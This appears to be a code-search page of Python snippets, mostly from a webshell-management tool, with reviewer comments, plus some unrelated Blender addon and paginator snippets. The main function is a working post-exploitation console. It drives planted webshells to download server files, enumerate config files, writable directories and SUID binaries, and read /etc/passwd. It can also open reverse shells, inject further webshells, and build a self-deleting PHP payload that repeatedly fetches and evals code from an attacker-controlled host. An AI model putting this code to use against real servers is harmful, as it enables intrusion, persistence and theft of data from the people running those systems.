コード例 #1
 def download_base(self, path, local_path):
     """Fetch remote file *path* into *local_path*, skipping an unchanged copy.

     When *local_path* already exists, the remote and local digests are
     compared first and the method returns early on a match.  Otherwise the
     remote content is requested base64-encoded through
     ``self.php_code_exec_token`` and written to *local_path* in binary mode.
     Every path returns ``None``; outcomes are reported through ``Log`` only.
     """
     Log.info("Ready to downloading file : %s" % path)
     Log.info("Detacting local file exists...")
     if not os.path.exists(local_path):
         Log.error("Local file not exists...")
     else:
         Log.info("Checking remote file (%s) hash..." % (path))
         digest_remote = self.hash_remote_file(path)
         Log.info("Find md5 of remote file (%s) : %s" % (path, digest_remote))
         Log.info("Checking local file (%s) hash..." % (local_path))
         digest_local = hash_file(local_path)
         Log.info("Find md5 of local file (%s) : %s" %
                  (local_path, digest_local))
         # The digests only decide "skip or re-fetch"; per the log text they
         # are MD5, which is fine for change detection and nothing stronger.
         if digest_remote == digest_local:
             Log.warning("File haved downloaded! Ignored!")
             return
         Log.warning("File updated, downloading new version...")
     # NOTE(review): *path* is formatted into the PHP statement as-is; a
     # double quote or backslash in it changes the statement that is sent.
     php_statement = 'echo base64_encode(file_get_contents("%s"));' % (path)
     fetched = self.php_code_exec_token(php_statement)
     if not fetched[0]:
         Log.error("Fetch data failed!")
         return
     Log.success("Fetch data success! Start saving...")
     encoded = fetched[1]
     # NOTE(review): local_path is opened exactly as given and the bytes come
     # from the remote side; nothing in this method confines the write to a
     # download directory - confirm the caller does.
     with open(local_path, "wb") as sink:
         Log.info("Saving...")
         # str.decode("base64") is a Python 2 codec call.
         sink.write(encoded.decode("base64"))
     Log.info("Download finished!")
コード例 #2
ファイル: paginator.py プロジェクト: hc990/dss
 def page(self):
     """Return the slice of ``self.collection`` that makes up the current page.

     The window starts at ``(page_number - 1) * limit`` and is ``limit``
     items long.  If slicing raises, the exception is logged as a warning
     and an empty list is returned instead.
     """
     first = (self.page_number - 1) * self.limit
     last = first + self.limit
     try:
         window = self.collection[first:last]
     except Exception as detail:
         # Best-effort: any slicing failure degrades to "no items".
         Log.warning(detail)
         return []
     return window
コード例 #3
 def page(self):
     """Return the items of ``self.collection`` belonging to the current page.

     Pages are 1-based: page ``n`` covers indices ``(n - 1) * limit`` up to,
     but not including, ``n * limit``.  A failure while slicing is logged
     through ``Log.warning`` and yields an empty list.
     """
     lower = (self.page_number - 1) * self.limit
     upper = lower + self.limit
     try:
         items = self.collection[lower:upper]
     except Exception as detail:
         # Deliberately broad: the caller always gets a list-like result.
         Log.warning(detail)
         return []
     return items
コード例 #4
 def get_writable_directory(self):
     """Run a ``find`` for writable directories under ``self.webroot`` and log it.

     ``self.auto_exec`` is expected to return a pair-like value: a success
     flag at index 0 and the command output (or error text) at index 1.
     Nothing is returned; the result is only reported through ``Log``.
     """
     # Defender note: a recursive `find ... -type d -writable` over the web
     # root is a recognisable enumeration step in process-audit logs.
     output = self.auto_exec("find %s -type d -writable" % (self.webroot))
     if not output[0]:
         Log.error("Error occured! %s" % output[1])
         return
     listing = output[1]
     if listing == "":
         Log.warning("Nothing found!")
         return
     Log.success("Found : \n%s" % listing)
コード例 #5
 def get_config_file(self):
     """Search ``self.webroot`` for file names containing common config keywords.

     One ``find -name`` is issued per keyword through ``self.auto_exec`` and
     each outcome (matches, no matches, or error text) is logged.  Nothing
     is returned.
     """
     for keyword in ("config", "db", "database"):
         Log.info("Using keyword : [%s]..." % (keyword))
         # self.webroot is interpolated unquoted; a path with spaces would
         # split into several find arguments.
         output = self.auto_exec(
             "find %s -name '*%s*'" % (self.webroot, keyword))
         if not output[0]:
             Log.error("Error occured! %s" % output[1])
             continue
         if output[1] == "":
             Log.warning("Nothing found!")
         else:
             Log.success("Found : \n%s" % output[1])
コード例 #6
 def get_suid_binaries(self):
     """List root-owned setuid files in a fixed set of binary directories.

     For every directory one ``find`` is run through ``self.auto_exec`` and
     the command plus its outcome are logged.  Nothing is returned.
     """
     # Defender note: a sweep of the standard PATH directories with
     # `-perm -4000` is a well-known local-enumeration pattern; presumably
     # auto_exec (not shown) runs it on the remote host, where process
     # auditing can alert on it.
     search_dirs = (
         '/usr/local/sbin', '/usr/local/bin', '/usr/sbin', '/usr/bin',
         '/sbin', '/bin', '/usr/games', '/usr/local/games', '/snap/bin',
     )
     for directory in search_dirs:
         command = "find %s -user root -perm -4000 -exec ls -ldb {} \;" % (directory)
         Log.info("Executing : %s" % (command))
         output = self.auto_exec(command)
         if not output[0]:
             Log.error("Error occured! %s" % output[1])
             continue
         if output[1] == "":
             Log.warning("Nothing found!")
         else:
             Log.success("Found : \n%s" % output[1])
コード例 #7
 def check_connection(self, url):
     """Send an HTTP HEAD to *url* and report whether the request completed.

     Returns ``True`` whenever a response arrives, whatever its status code
     (a non-200 status only produces a warning), and ``False`` when the
     request raises.
     """
     Log.info("Checking the connection to the webshell...")
     try:
         # NOTE(review): no timeout is passed, so an unresponsive host can
         # block this call indefinitely.
         status = requests.head(url).status_code
         if status == 200:
             Log.success("The status code is %d" % (status))
         else:
             Log.warning("The status code is %d, the webshell may have some problems..." % (status))
         return True
     except:
         # NOTE(review): bare except - this also absorbs KeyboardInterrupt
         # and SystemExit, not just network errors.
         Log.error("Connection error!")
         return False
コード例 #8
 def get_disabled_functions(self):
     """Log PHP's ``disable_functions`` setting, caching it on the instance.

     If ``self.disabled_functions`` is already non-empty it is printed and
     nothing is fetched.  Otherwise the ini value is requested through
     ``self.php_code_exec_token``, split on commas, stored in
     ``self.disabled_functions`` and logged.  Nothing is returned.
     """
     if len(self.disabled_functions) > 0:
         Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
         return
     result = self.php_code_exec_token("echo ini_get('disable_functions');")
     if not result[0]:
         Log.error("Error occured! %s" % result[1])
         return
     raw_value = result[1]
     if raw_value == "":
         # An empty cache means this branch is re-queried on every call.
         Log.warning("No function disabled!")
         self.disabled_functions = []
         return
     # NOTE(review): [:-1] discards the final field; that is only right if
     # the reply ends with a trailing comma - otherwise the last function
     # name is silently lost.  TODO confirm against the reply format.
     self.disabled_functions = raw_value.split(",")[:-1]
     Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
コード例 #9
 def get_writable_directory(self):
     """Return the writable directories found under ``self.webroot``.

     Runs ``find -type d -writable`` through ``self.auto_exec`` and returns
     the reported paths as a list of strings.  An execution error or an
     empty result both give ``[]``; each outcome is also logged.
     """
     output = self.auto_exec("find %s -type d -writable" % (self.webroot))
     if not output[0]:
         Log.error("Error occured! %s" % output[1])
         return []
     if output[1] == "":
         Log.warning("Nothing found!")
         return []
     # The [0:-1] slices drop the last character / last split field,
     # presumably the trailing newline of the command output.
     Log.success("Found : \n%s" % output[1][0:-1])
     # Lines starting with "find: '" are find's own diagnostics (for
     # example permission errors) mixed into the output, not results.
     return [
         entry
         for entry in output[1].split("\n")[0:-1]
         if not entry.startswith("find: '")
     ]
コード例 #10
 def show_options(self):
     """Print a table of this object's options, one row per config key.

     Rows are sorted by key and show the key, its ``"necessity"`` entry and
     the value returned by ``self.get_config(key)``.  Output goes through
     ``Log.warning``; nothing is returned.
     """
     for header_line in ("Options\t\tNecessity\t\tDefault",
                         "-------\t\t---------\t\t-------"):
         Log.warning(header_line)
     for name in sorted(self.config.keys()):
         necessity = self.config[name]["necessity"]
         # The column is headed "Default" but shows whatever get_config
         # returns for the key.
         shown_value = self.get_config(name)
         Log.warning("%s\t\t%s\t\t\t%s" % (name, necessity, shown_value))
コード例 #11
 def show_options(self):
     '''
     Print this module's option information (the config defined earlier).
     Triggered by the options command.
     Usually does not need to be changed.
     '''
     table_header = (
         "Options\t\tNecessity\t\tDefault",
         "-------\t\t---------\t\t-------",
     )
     for line in table_header:
         Log.warning(line)
     for option in sorted(self.config.keys()):
         # One row per option: name, its "necessity" entry, and the value
         # get_config reports for it.
         row = (option, self.config[option]["necessity"],
                self.get_config(option))
         Log.warning("%s\t\t%s\t\t\t%s" % row)
コード例 #12
    #"space_view3d_Meta-Tools_0-3_tab",
    "mass_align",
    "modifier_tool",
    "subdiv_tool",
    "wireframe_toggle",
    "DeadlineBlenderClient",
    "custom_file_tab",  #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon
    "cubesurfer",
]

import addon_utils
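# Enable every addon named in addon_startup_list; a failing addon is logged
# and skipped so the remaining ones still load.
for addon in addon_startup_list:
    try:
        enabled_module = addon_utils.enable(addon, default_set=True)
    except Exception:
        # Narrowed from a bare except so Ctrl-C / SystemExit still propagate.
        log.warning("Could not enable addon %s - skipped" % addon)
    else:
        # addon_utils.enable() returns the loaded module, or None when the
        # addon could not be enabled; the old code logged "Loaded" in both
        # cases.
        if enabled_module is None:
            log.warning("Could not enable addon %s - skipped" % addon)
        else:
            log.info("Loaded addon %s" % addon)

# Setup defaults - base this on the show.  TODO: un-hardcode this

# Basic render settings: 24 fps, 1440x810 at 100 %, square pixels
bpy.context.scene.render.fps = 24
bpy.context.scene.render.resolution_x = 1440
bpy.context.scene.render.resolution_y = 810
bpy.context.scene.render.resolution_percentage = 100
bpy.context.scene.render.pixel_aspect_x = 1.0
bpy.context.scene.render.pixel_aspect_y = 1.0

# Store the current render engine - we need to restore this after
render_engine = bpy.context.scene.render.engine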
コード例 #13
    #"space_view3d_Meta-Tools_0-3_tab",
    "mass_align",
    "modifier_tool",
    "subdiv_tool",
    "wireframe_toggle",
    "DeadlineBlenderClient",
    "custom_file_tab", #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon
    "cubesurfer",
]

import addon_utils
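# Enable every addon named in addon_startup_list; a failing addon is logged
# and skipped so the remaining ones still load.
for addon in addon_startup_list:
    try:
        enabled_module = addon_utils.enable(addon, default_set=True)
    except Exception:
        # Narrowed from a bare except so Ctrl-C / SystemExit still propagate.
        log.warning("Could not enable addon %s - skipped" % addon)
    else:
        # addon_utils.enable() returns the loaded module, or None when the
        # addon could not be enabled; the old code logged "Loaded" in both
        # cases.
        if enabled_module is None:
            log.warning("Could not enable addon %s - skipped" % addon)
        else:
            log.info("Loaded addon %s" % addon)


# Setup defaults - base this on the show.  TODO: un-hardcode this

# Basic render settings: 24 fps, 1440x810 at 100 %, square pixels
bpy.context.scene.render.fps = 24
bpy.context.scene.render.resolution_x = 1440
bpy.context.scene.render.resolution_y = 810
bpy.context.scene.render.resolution_percentage = 100
bpy.context.scene.render.pixel_aspect_x = 1.0
bpy.context.scene.render.pixel_aspect_y = 1.0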

# Store the current render engine - we need to restore this after
コード例 #14
ファイル: sniper.py プロジェクト: t34t/Webshell-Sniper
def main():
    """Entry point: collect the working webshell endpoints and run the command loop.

    With one command-line argument the endpoints are read from a JSON file
    (a list of objects with 'url', 'method' and 'password' keys); with three
    arguments a single endpoint is built from url, method and password.  Any
    other argument count prints the help text and exits with status 1.
    Exit status 2 means no endpoint from the file was working, 3 means the
    single endpoint was not working.

    Each command typed at the prompt is then applied to every endpoint in
    ``webshells`` in turn, until a quit command saves the list and leaves
    the loop.

    NOTE(review): Python 2 only as written (raw_input, string.lower,
    string.letters, str.encode("base64")).
    """
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    default_filename = "webshells"
    banner()
    webshells = []
    if len(sys.argv) == 2:
        filename = sys.argv[1]
        Log.info("Loding from file : %s ..." % (filename))
        # NOTE(review): the file object is never closed explicitly, and the
        # file it reads holds endpoint passwords in clear text.
        webshells_config = json.load(open(filename))
        for webshell_config in webshells_config:
            webshell = WebShell(webshell_config['url'],
                                webshell_config['method'],
                                webshell_config['password'])
            if webshell.working:
                Log.success(
                    "This webshell works well, adding into online list...")
                # De-duplicate by URL: an endpoint already in the list is skipped.
                SAME_FLAG = False
                for online_webshell in webshells:
                    if online_webshell.url == webshell.url:
                        Log.warning("Same webshell detected! Skipping...")
                        SAME_FLAG = True
                        break
                if SAME_FLAG:
                    continue
                webshells.append(webshell)
            else:
                Log.error("This webshell can not work...")
        Log.info("Loading file finished!")
        if len(webshells) == 0:
            Log.error("No webshell works well, exiting...")
            exit(2)
        Log.info("%d webshells alive!" % (len(webshells)))
        Log.info("Entering interactive mode...")
    elif len(sys.argv) == 4:
        url = sys.argv[1]
        method = sys.argv[2]
        password = sys.argv[3]
        webshell = WebShell(url, method, password)
        if webshell.working:
            Log.success("This webshell works well, adding into online list...")
            webshells.append(webshell)
        else:
            Log.error("This webshell can not work...")
            exit(3)
    else:
        show_help()
        exit(1)

    # True: unrecognised input is run as a local shell command;
    # False: it is sent to every endpoint (toggled by "setl" / "setr").
    LOCAL_COMMAND_FLAG = True
    main_help()

    while True:
        Log.context("sniper")
        # Empty input falls back to "h" (help).  context_fresh keeps the
        # original casing for the command fallback at the bottom of the loop.
        context_fresh = raw_input("=>") or "h"
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        #elif context == "sh" or context == "shell":
        #    shell = Shell(webshell)
        #    shell.interactive()
        elif context == "rsh" or context == "rshell":
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" %
                           (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.print_info()
        elif context == "pv" or context == "php_version":
            for webshell in webshells:
                Log.info(str(webshell.info))
                Log.success(webshell.get_php_version())
        elif context == "kv" or context == "kernel_version":
            for webshell in webshells:
                Log.info(str(webshell.info))
                Log.success(webshell.get_kernel_version())
        elif context == "c" or context == "config":
            for webshell in webshells:
                Log.info(str(webshell.info))
                Log.info("Detacting config files...")
                webshell.get_config_file()
        elif context == "fwd":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_writable_directory()
        elif context == "gdf":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_disabled_functions()
        elif context == "fwpf":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_writable_php_file()
        elif context == "fsb":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            # NOTE(review): `webshell` here is whatever an earlier loop left
            # bound, so the default path shown comes from one endpoint only
            # (possibly one that was rejected while loading).
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " %
                             (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.download_advanced(path, args)
        elif context == "dl":
            # NOTE(review): same leftover-`webshell` default as in "dla".
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            for webshell in webshells:
                Log.info(str(webshell.info))
                if not webshell.file_exists(path):
                    Log.error("The file [%s] is not exists on the server!" %
                              (path))
                    continue
                if webshell.is_directory(path):
                    Log.info(
                        "The target file is a directory, using recursion download..."
                    )
                    filename_filter = raw_input("Input --name '%s' : " %
                                                ("*.php")) or "*.php"
                    webshell.download_recursion(path, filename_filter)
                else:
                    #filename = path.split("/")[-1]
                    #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                    # Log.info("Using root path : [%s] to save!" % (local_path))
                    Log.info(
                        "The target file is a single file, starting download..."
                    )
                    # The remote path is passed as the second argument too;
                    # how download() maps it to a local location is not
                    # visible here.
                    webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            # Only the presence of "/" is checked; the value is not parsed
            # as a network here.
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.port_scan(hosts, ports)
        elif context == "aiw":
            # NOTE(review): this overwrites default_filename, which the quit
            # branch later uses to name the saved session file.
            # `salt` is not defined in this function - presumably a
            # module-level value; verify.
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.auto_inject_webshell(filename, password)
        elif context == "aimw":
            # Same filename/password derivation as "aiw" (and the same
            # default_filename overwrite).
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.auto_inject_memery_webshell(filename, password)
        elif context == "fr":
            Log.info("Starting flag reaper...")
            webserver_host = raw_input("[IP] (%s) : " %
                                       (get_ip_address())) or get_ip_address()
            # NOTE(review): int() raises ValueError on non-numeric input and
            # nothing here catches it.
            webserver_port = int(raw_input("[PORT] (80) : ") or "80")
            filename = ".%s.php" % (random_string(0x10, string.letters))
            # Defender note: the generated PHP removes its own file and then
            # fetches and evaluates a remote URL every 5 seconds, so the
            # artefact to look for is a long-lived PHP worker making periodic
            # outbound HTTP requests rather than a file on disk.
            file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (
                webserver_host, webserver_port)
            Log.info("Temp memory phpfile : %s" % (file_content))
            Log.info("Encoding phpfile...")
            file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (
                file_content.encode("base64").replace("\n", ""))
            Log.info("Final memory phpfile : %s" % (file_content))
            for webshell in webshells:
                Log.info(str(webshell.info))
                result = webshell.auto_inject_flag_reaper(
                    filename, file_content)
                if result:
                    Log.success(
                        "Please check the web server(%s:%d) log to get your flag!"
                        % (webserver_host, webserver_port))
                    Log.info("Tips : tail -f /var/log/apache2/access.log")
                else:
                    Log.error("Starting flag reaper failed!")
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            # NOTE(review): the database password is written to the log in
            # clear text on the next line.
            Log.info("Creating connection by [%s:%s] to [%s]..." %
                     (username, password, ip))
            for webshell in webshells:
                Log.info(str(webshell.info))
                mysql_connection = Mysql(webshell, ip, username, password)
                if not mysql_connection.function:
                    Log.error("The target server cannot support mysql!")
                    continue
                if not mysql_connection.connection_flag:
                    Log.error("Connection failed!")
                    continue
                Log.success("Connection success!")
                # NOTE(review): a falsy `function` already hit `continue`
                # above, so for string values the else branch below looks
                # unreachable.
                if mysql_connection.function != "":
                    Log.success("Entering database server interactive mode...")
                    mysql_connection.interactive()
                else:
                    Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("recording this webshell to the log file...")
            # The session file is named <default_filename>_<unix time>.json;
            # presumably it contains the endpoint passwords - verify what
            # save_webshells writes.
            save_webshells(webshells,
                           "%s_%d.json" % (default_filename, time.time()))
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            # NOTE(review): any input that is not a known command is run
            # verbatim - by default through os.system on the local machine,
            # so a mistyped command name becomes a local shell command.
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                for webshell in webshells:
                    Log.info(str(webshell.info))
                    webshell.auto_exec_print(context_fresh)